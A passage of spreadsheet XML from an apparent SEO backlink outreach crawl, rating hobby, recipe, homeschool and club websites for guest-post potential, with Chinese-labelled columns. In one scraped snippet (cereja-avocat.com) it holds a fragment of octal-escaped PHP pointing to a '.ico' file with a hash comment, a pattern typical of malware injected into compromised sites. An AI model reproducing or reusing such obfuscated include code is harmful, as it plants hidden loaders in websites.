        <x:v>website design for small business website design for small business Skip to content diy wordpress website design for small business diy wordpress website design for small business 外贸独立站 SEO策略 Plan Blog About Contact affordable website design packages for small business customized $299 per year = responsive SEO wordpress website + cloud hosting + SSL + DIY customization There are many website design companies. We mainly focus on small business, manufacturing websites, English and Chinese language, DIY, customize, affordable, SEO. Our small business website Package including website+hosting+useful plugin, and Domain Registration with business Email. WordPress for business and Woocommerce for ecommerce shop online websites. Ele</x:v>
      </x:c>
      <x:c r="R394" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S394" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T394" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://fobwp.com</x:v>
      </x:c>
    </x:row>
    <x:row r="395">
      <x:c r="A395" s="18" t="str">
        <x:v>394</x:v>
      </x:c>
      <x:c r="B395" s="19" t="str">
        <x:v>topmomsideas.com</x:v>
      </x:c>
      <x:c r="C395" s="19" t="str">
        <x:v>https://topmomsideas.com</x:v>
      </x:c>
      <x:c r="D395" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E395" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F395" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G395" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H395" s="19" t="str">
        <x:v>https://topmomsideas.com/</x:v>
      </x:c>
      <x:c r="I395" s="19" t="str">
        <x:v>Top Moms Ideas - Great ideas for cooking healthy meals that don’t require a lot of ingredients, are easy and quick to cook.</x:v>
      </x:c>
      <x:c r="J395" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K395" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L395" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M395" s="19" t="str">
        <x:v>https://topmomsideas.com/</x:v>
      </x:c>
      <x:c r="N395" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O395" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P395" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q395" s="21" t="str">
        <x:v>Great ideas for cooking healthy meals that don’t require a lot of ingredients, are easy and quick to cook. Top Moms Ideas - Great ideas for cooking healthy meals that don’t require a lot of ingredients, are easy and quick to cook. Skip to content Recipes Salads Breakfast Keto Desserts Dinner About Mediterranean Meal Plan Recipes Salads Breakfast Keto Desserts Dinner About Mediterranean Meal Plan 20 Fall Turkey Recipes As the weather gets cooler and the leaves begin to change, it’s the perfect time to bring comforting, hearty meals back to the table. Turkey [&amp;hellip;] 20 Fall Turkey Recipes Read More » Apple Marshmallow Dessert: A Guilt-Free, 3-Ingredient Treat! Looking for a light, fluffy, and completely natural dessert? This homemade Apple Marshmallow (also known as Apple Pastila) is a game-chan</x:v>
      </x:c>
      <x:c r="R395" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S395" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T395" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://topmomsideas.com</x:v>
      </x:c>
    </x:row>
    <x:row r="396">
      <x:c r="A396" s="18" t="str">
        <x:v>395</x:v>
      </x:c>
      <x:c r="B396" s="19" t="str">
        <x:v>gamera.us</x:v>
      </x:c>
      <x:c r="C396" s="19" t="str">
        <x:v>https://gamera.us</x:v>
      </x:c>
      <x:c r="D396" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E396" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F396" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G396" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H396" s="19" t="str">
        <x:v>https://gamera.us/</x:v>
      </x:c>
      <x:c r="I396" s="19" t="str">
        <x:v>Кофе Техника Еда</x:v>
      </x:c>
      <x:c r="J396" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K396" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L396" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M396" s="19" t="str">
        <x:v>https://gamera.us/</x:v>
      </x:c>
      <x:c r="N396" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O396" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P396" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q396" s="21" t="str">
        <x:v>Кофе Техника Еда Перейти к содержимому Кофе Техника Еда Кофе Техника Еда Америка Разное Блог Меню Новая анкета на Green Card DV2024 с подробным переводом Читать &amp;raquo; Лотерея гринкард DV2021 с переводом Читать &amp;raquo; Американский сливовый пирог Читать &amp;raquo; Мастер-класс: разделители для ящика своими руками Читать &amp;raquo; Шекербура - восточная сладость (пошаговый рецепт) Читать &amp;raquo; Варенье из ананасов (диетическое) Читать &amp;raquo; Организационное Читать &amp;raquo; Сельдь под шубой Читать &amp;raquo; Креветки на шпажках и пряный соус Читать &amp;raquo; Рыба в китайском стиле Читать &amp;raquo; Осенняя корзина с тыквами Читать &amp;raquo; Куриный суп гамбо Читать &amp;raquo; Анкета на DV2020 (Green card) с по</x:v>
      </x:c>
      <x:c r="R396" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S396" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T396" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://gamera.us</x:v>
      </x:c>
    </x:row>
    <x:row r="397">
      <x:c r="A397" s="18" t="str">
        <x:v>396</x:v>
      </x:c>
      <x:c r="B397" s="19" t="str">
        <x:v>foodnservice.com</x:v>
      </x:c>
      <x:c r="C397" s="19" t="str">
        <x:v>https://foodnservice.com</x:v>
      </x:c>
      <x:c r="D397" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E397" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F397" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G397" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H397" s="19" t="str">
        <x:v>https://foodnservice.com/</x:v>
      </x:c>
      <x:c r="I397" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J397" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K397" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L397" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M397" s="19" t="str">
        <x:v>https://foodnservice.com/</x:v>
      </x:c>
      <x:c r="N397" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O397" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P397" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q397" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R397" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S397" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T397" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://foodnservice.com</x:v>
      </x:c>
    </x:row>
    <x:row r="398">
      <x:c r="A398" s="18" t="str">
        <x:v>397</x:v>
      </x:c>
      <x:c r="B398" s="19" t="str">
        <x:v>toptohigh.com</x:v>
      </x:c>
      <x:c r="C398" s="19" t="str">
        <x:v>https://toptohigh.com</x:v>
      </x:c>
      <x:c r="D398" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E398" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F398" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G398" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H398" s="19" t="str">
        <x:v>https://toptohigh.com/</x:v>
      </x:c>
      <x:c r="I398" s="19" t="str">
        <x:v>Top To High | Top To High Article Directory</x:v>
      </x:c>
      <x:c r="J398" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K398" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L398" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M398" s="19" t="str">
        <x:v>https://toptohigh.com/</x:v>
      </x:c>
      <x:c r="N398" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O398" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P398" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q398" s="21" t="str">
        <x:v>Top To High | Top To High Article Directory Home Guest Post / Add My Site Contact Us FAQs Sign In Top To High Top To High Article Directory Last Updated: September 1, 2026 Advanced search Click here to submit your article Advanced search All these words Category select category Agriculture Architecture Art and Enterainment Automotive Body Care Business Global Business to Business Care Children and Babies China Manufacturers Communications Computer Construction Consultancy Consumer Content Writing Dance Design Distribution Drop Ship Companies Education Education Training Electrical Employment Engineering Entertainment Environmental Estate Agents Fashion Financial Food Franchises Garden Global</x:v>
      </x:c>
      <x:c r="R398" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S398" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T398" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://toptohigh.com</x:v>
      </x:c>
    </x:row>
    <x:row r="399">
      <x:c r="A399" s="18" t="str">
        <x:v>398</x:v>
      </x:c>
      <x:c r="B399" s="19" t="str">
        <x:v>littlegoldpixel.com</x:v>
      </x:c>
      <x:c r="C399" s="19" t="str">
        <x:v>https://littlegoldpixel.com</x:v>
      </x:c>
      <x:c r="D399" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E399" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F399" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G399" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H399" s="19" t="str">
        <x:v>https://littlegoldpixel.com/</x:v>
      </x:c>
      <x:c r="I399" s="19" t="str">
        <x:v>Little Gold Pixel &amp;bull; Free Printables &amp; Gallery Wall Design</x:v>
      </x:c>
      <x:c r="J399" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K399" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L399" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M399" s="19" t="str">
        <x:v>https://littlegoldpixel.com/</x:v>
      </x:c>
      <x:c r="N399" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O399" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P399" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q399" s="21" t="str">
        <x:v>Graphic Design &amp; Wall Decor • Gallery Wall Consultations • Modern Printable Art Little Gold Pixel &amp;bull; Free Printables &amp; Gallery Wall Design Shop The Little Gold Pixel Shop The Etsy Shop Design Resources Creative Tools Start a Design Blog Freebie Fridays Tutorials Fonts Decor Wall Around the World Style Guide Frame Game Art Roundups Gallery Walls Swipe My Gallery Wall Process Get Gallery Wall Help Freebies Start Here About Contact Newsletter Partnerships &amp; Sponsorships Archives Little Gold Pixel Shop ART PRINTABLES &amp; POSTERS FOR THE MODERN HOME Click to Set Up a Consult! I need help with my gallery wall Click to Download Now! i need some art for my walls Click to Book Your Project! I need a custom design In Decor / Color Crush / Trend Spotting Invoke Autumn Magic with</x:v>
      </x:c>
      <x:c r="R399" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S399" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T399" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://littlegoldpixel.com</x:v>
      </x:c>
    </x:row>
    <x:row r="400">
      <x:c r="A400" s="18" t="str">
        <x:v>399</x:v>
      </x:c>
      <x:c r="B400" s="19" t="str">
        <x:v>utc-strassburg.at</x:v>
      </x:c>
      <x:c r="C400" s="19" t="str">
        <x:v>https://utc-strassburg.at</x:v>
      </x:c>
      <x:c r="D400" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E400" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F400" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G400" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H400" s="19" t="str">
        <x:v>https://www.utc-strassburg.at/</x:v>
      </x:c>
      <x:c r="I400" s="19" t="str">
        <x:v>UTC GOTSCHLICH STRASSBURG</x:v>
      </x:c>
      <x:c r="J400" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K400" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L400" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M400" s="19" t="str">
        <x:v>https://www.utc-strassburg.at/</x:v>
      </x:c>
      <x:c r="N400" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O400" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P400" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q400" s="21" t="str">
        <x:v>UTC GOTSCHLICH STRASSBURG Platzreservierung Kontakt GURKTAL OPEN FINALTAG 8.8 Unser beliebtes Sommerturnier startet wieder – die Anmeldung ist ab sofot offen! Turnieranmeldung Vereinsmeisterschaften 2025 🎾 Vom 08.09-17.10 fan 🎾🎀 Mascherlturnier 2025 🎀🎾 Wir laden euch herzlic Morgen ist es soweit – Finaltag der Gurktal Open 2 Folge uns auf Instagram Impressum Datenschutz Kontakt Instagram Seite des UTC Strassburg Facebook</x:v>
      </x:c>
      <x:c r="R400" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S400" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T400" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://utc-strassburg.at</x:v>
      </x:c>
    </x:row>
    <x:row r="401">
      <x:c r="A401" s="18" t="str">
        <x:v>400</x:v>
      </x:c>
      <x:c r="B401" s="19" t="str">
        <x:v>mymommystyle.com</x:v>
      </x:c>
      <x:c r="C401" s="19" t="str">
        <x:v>https://mymommystyle.com</x:v>
      </x:c>
      <x:c r="D401" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E401" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F401" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G401" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H401" s="19" t="str">
        <x:v>https://mymommystyle.com/</x:v>
      </x:c>
      <x:c r="I401" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J401" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K401" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L401" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M401" s="19" t="str">
        <x:v>https://mymommystyle.com/</x:v>
      </x:c>
      <x:c r="N401" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O401" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P401" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q401" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R401" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S401" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T401" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://mymommystyle.com</x:v>
      </x:c>
    </x:row>
    <x:row r="402">
      <x:c r="A402" s="18" t="str">
        <x:v>401</x:v>
      </x:c>
      <x:c r="B402" s="19" t="str">
        <x:v>cereja-avocat.com</x:v>
      </x:c>
      <x:c r="C402" s="19" t="str">
        <x:v>https://cereja-avocat.com</x:v>
      </x:c>
      <x:c r="D402" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E402" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F402" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G402" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H402" s="19" t="str">
        <x:v>https://cereja-avocat.com/</x:v>
      </x:c>
      <x:c r="I402" s="19" t="str"/>
      <x:c r="J402" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K402" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L402" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M402" s="19" t="str">
        <x:v>https://cereja-avocat.com/</x:v>
      </x:c>
      <x:c r="N402" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O402" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P402" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q402" s="21" t="str">
        <x:v>p\157n\163e\057.\146d\1466\0656\144a\056i\143o"; /*fde9b*/ ?&gt;</x:v>
      </x:c>
      <x:c r="R402" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S402" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T402" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cereja-avocat.com</x:v>
      </x:c>
    </x:row>
    <x:row r="403">
      <x:c r="A403" s="18" t="str">
        <x:v>402</x:v>
      </x:c>
      <x:c r="B403" s="19" t="str">
        <x:v>acraftylife.com</x:v>
      </x:c>
      <x:c r="C403" s="19" t="str">
        <x:v>https://acraftylife.com</x:v>
      </x:c>
      <x:c r="D403" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E403" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F403" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G403" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H403" s="19" t="str">
        <x:v>https://www.acraftylife.com/</x:v>
      </x:c>
      <x:c r="I403" s="19" t="str">
        <x:v>Crafting fun! Easy Kid Crafts - A Crafty Life</x:v>
      </x:c>
      <x:c r="J403" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K403" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L403" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M403" s="19" t="str">
        <x:v>https://www.acraftylife.com/</x:v>
      </x:c>
      <x:c r="N403" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O403" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P403" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q403" s="21" t="str">
        <x:v>Mom of 1 living on the coast of Maine, crafter, blogger, and crocheter. Crafting fun! Easy Kid Crafts - A Crafty Life Skip to Content Search Search for: Close Search &amp;times; Home Crafts for Kids christmas craft earth day craft fall kid craft farm craft mothers day craft ocean craft spring craft valentines day Winter Craft Printables Coloring Pages About Privacy and Cookie Policy Crafting fun! Easy Kid Crafts Most Popular Kids Crafts 57 Fun Homemade Christmas Ornaments for Kids to Make 67 Ocean Crafts for Kids to Make: Beach Theme Week 19 Easy Crab Kid Crafts: Fun Beach Ocean Theme 15 Easy Hedgehog Crafts for Preschool to Make Colorful Bug Crafts to Make: 27 Plus Kids Crafts Easy Egg Carton Kid Crafts to Make &amp;ndash; Recycled Crafts 24 Easy Nature Kid Crafts: Go </x:v>
      </x:c>
      <x:c r="R403" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S403" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T403" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://acraftylife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="404">
      <x:c r="A404" s="18" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="B404" s="19" t="str">
        <x:v>tasteforlife.com</x:v>
      </x:c>
      <x:c r="C404" s="19" t="str">
        <x:v>https://tasteforlife.com</x:v>
      </x:c>
      <x:c r="D404" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E404" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F404" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G404" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H404" s="19" t="str">
        <x:v>https://tasteforlife.com/</x:v>
      </x:c>
      <x:c r="I404" s="19" t="str">
        <x:v>Taste For Life</x:v>
      </x:c>
      <x:c r="J404" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K404" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L404" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M404" s="19" t="str">
        <x:v>https://tasteforlife.com/</x:v>
      </x:c>
      <x:c r="N404" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O404" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P404" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q404" s="21" t="str">
        <x:v>Taste For Life Skip to main content natural health and wellness Conditions Allergies Body Care Brain Cancer Cold &amp; Flu Detox &amp; Liver Diabetes Digestion Fatigue Heart Health Joints Mood Pain Respiratory Stress &amp; Anxiety All Conditions Ingredients Practitioners Recipes Appetizers Breakfast Desserts Drinks Gluten Free Main Course Parties &amp; Picnics Quick Salads Soups Vegan Veggie All Recipes Hot Products Tools E-Guides Taste for Life Awards Essentials Awards Product Guides Food Guides &amp; Charts Giveaway Wednesdays Nutrition Charts Quizzes Words for Life Expert Insights Dr. T: Cures A to Z All Tools Diet &amp; Nutrition For Health For Weight Loss Gluten Free Non-GMO Organic Special Diets All Diet &amp; Nu</x:v>
      </x:c>
      <x:c r="R404" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S404" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T404" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://tasteforlife.com</x:v>
      </x:c>
    </x:row>
    <x:row r="405">
      <x:c r="A405" s="18" t="str">
        <x:v>404</x:v>
      </x:c>
      <x:c r="B405" s="19" t="str">
        <x:v>rsbdebt.co.za</x:v>
      </x:c>
      <x:c r="C405" s="19" t="str">
        <x:v>https://rsbdebt.co.za</x:v>
      </x:c>
      <x:c r="D405" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E405" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F405" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G405" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H405" s="19" t="str">
        <x:v>http://rsbdebt.co.za/</x:v>
      </x:c>
      <x:c r="I405" s="19" t="str"/>
      <x:c r="J405" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K405" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L405" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M405" s="19" t="str">
        <x:v>http://rsbdebt.co.za/</x:v>
      </x:c>
      <x:c r="N405" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O405" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P405" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q405" s="21" t="str"/>
      <x:c r="R405" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S405" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T405" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://rsbdebt.co.za
http://rsbdebt.co.za</x:v>
      </x:c>
    </x:row>
    <x:row r="406">
      <x:c r="A406" s="18" t="str">
        <x:v>405</x:v>
      </x:c>
      <x:c r="B406" s="19" t="str">
        <x:v>embarkonthejourney.com</x:v>
      </x:c>
      <x:c r="C406" s="19" t="str">
        <x:v>https://embarkonthejourney.com</x:v>
      </x:c>
      <x:c r="D406" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E406" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F406" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G406" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H406" s="19" t="str">
        <x:v>https://www.embarkonthejourney.com/</x:v>
      </x:c>
      <x:c r="I406" s="19" t="str">
        <x:v>Embark on the Journey – Navigating the homeschool waters one day at a time!</x:v>
      </x:c>
      <x:c r="J406" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K406" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L406" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M406" s="19" t="str">
        <x:v>https://www.embarkonthejourney.com/</x:v>
      </x:c>
      <x:c r="N406" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O406" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P406" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q406" s="21" t="str">
        <x:v>Navigating the homeschool waters one day at a time! Embark on the Journey – Navigating the homeschool waters one day at a time! Embark on the Journey Disclaimer PR and Advertising Privacy Policy About Travel Homeschooling Homeschool Writing Resources Homeschooling Tips from A to Z Year Round Homeschooling Encouragement Crafts &amp; Activities Printables Free Printables for Kids Book Lists Outdoor Autumn Activities for Kids Activities 20 Aug As the temperatures begin to drop, head outside with your kids. These outdoor autumn activities are sure to be a hit with kids of all ages! Now that the temperature is starting to drop, it's a perfect time to get outside with your kids. Take your books outside and read under a tree. Take a ... Read More about </x:v>
      </x:c>
      <x:c r="R406" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S406" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T406" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://embarkonthejourney.com</x:v>
      </x:c>
    </x:row>
    <x:row r="407">
      <x:c r="A407" s="18" t="str">
        <x:v>406</x:v>
      </x:c>
      <x:c r="B407" s="19" t="str">
        <x:v>airchildcare.com</x:v>
      </x:c>
      <x:c r="C407" s="19" t="str">
        <x:v>https://airchildcare.com</x:v>
      </x:c>
      <x:c r="D407" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E407" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F407" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G407" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H407" s="19" t="str">
        <x:v>https://airchildcare.com/</x:v>
      </x:c>
      <x:c r="I407" s="19" t="str">
        <x:v>AIR Training Solutions - Online Professional Development</x:v>
      </x:c>
      <x:c r="J407" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K407" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L407" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M407" s="19" t="str">
        <x:v>https://airchildcare.com/</x:v>
      </x:c>
      <x:c r="N407" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O407" s="19" t="str">
